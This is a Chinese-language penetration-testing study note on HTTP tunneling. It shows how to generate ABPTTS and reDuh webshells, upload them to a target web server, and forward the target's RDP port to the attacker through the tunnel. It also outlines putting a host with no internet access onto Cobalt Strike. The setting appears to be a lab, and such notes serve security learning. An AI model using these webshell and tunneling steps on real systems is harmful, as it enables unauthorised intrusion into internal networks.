8月19日笔记

http隧道搭建(续)

ABPTTS安装使用

一款基于 SSL 加密的 HTTP 端口转发工具,全程通信数据加密,比 reGerog 都要稳定。使用 python2 编写,但是该工具只支持 aspx 和 jsp 脚本的网站。

下载地址:https://github.com/nccgroup/ABPTTS

下载依赖:pip2 install pycrypto httplib2

使用教程

复制代码
python2 abpttsfactory.py -o webshell

执行上面的命令会在ABPTTS目录下生成webshell目录

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

这样就上传成功了。接下来输入以下指令(linux/mac):

复制代码
python2 abpttsclient.py -c webshell/config.txt -u http://192.168.5.138/abptts.jsp -f 127.0.0.1:3389/192.168.5.138:3389 --unsafetls

进行端口转发。会将目标机器的 3389 端口映射到本地的 3389 端口。

如果是windows版本的:

复制代码
python2 abpttsclient.py -c webshell\config.txt -u http://10.211.55.3:8080/shiro/abptts.jsp -f 127.0.0.1:3389/10.211.55.3:3389 --unsafetls

输入以下命令查看我们攻击机的端口有没有开放(kali):

复制代码
nc -zv localhost 3389

已经成功开放了。

现在只要用ssh和RDP到本地的3389端口就可以连接到目标主机的3389端口了。

reDuh

reDuh 是一款将 TCP 流量封装在 HTTP 流量中的工具。

下载地址:https://github.com/sensepost/reDuh

下载下来后打开servers的文件夹。

将对应脚本语言的文件上传到目标 web 目录下,访问如下。

进入reDuh/reDuhClient/dist的目录下,然后在本地执行如下命令

复制代码
java -jar reDuhClient.jar http://192.168.5.138/reDuh.jsp

根据返回的内容提示我们监听本地的1010端口。

重新开一个窗口,使用 nc 监听本地的 1010 端口,然后执行如下命令,将目标主机的 3389 端口映射到本地的 33389 端口。

复制代码
nc -vv localhost 1010
[createTunnel]33389:127.0.0.1:3389

然后连接本地的 33389 端口即可连接到目标内网的 3389 了。

不出网上线CS

我们打下了一个目标机器 192.168.5.138,但是该机器不出网,我们现在想让其上线CS。我们的思路是这样的,通过配置代理,让本地虚拟机 192.168.5.128 可以访问到目标机器。然后让本地虚拟机上线 cs,走 bind_tcp 去连接目标机器。(环境问题,明天继续整)

相关推荐
齐生11 天前
iOS 知识点 - 渲染机制、动画、卡顿小集合
笔记
用户962377954482 天前
VulnHub DC-1 靶机渗透测试笔记
笔记·测试
齐生13 天前
iOS 知识点 - IAP 是怎样的?
笔记
tingshuo29173 天前
D006 【模板】并查集
笔记
tingshuo29174 天前
S001 【模板】从前缀函数到KMP应用 字符串匹配 字符串周期
笔记
DianSan_ERP9 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
西岸行者9 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习
呉師傅9 天前
火狐浏览器报错配置文件缺失如何解决#操作技巧#
运维·网络·windows·电脑
starlaky9 天前
Django入门笔记
笔记·django
勇气要爆发9 天前
吴恩达《LangChain LLM 应用开发精读笔记》1-Introduction_介绍
笔记·langchain·吴恩达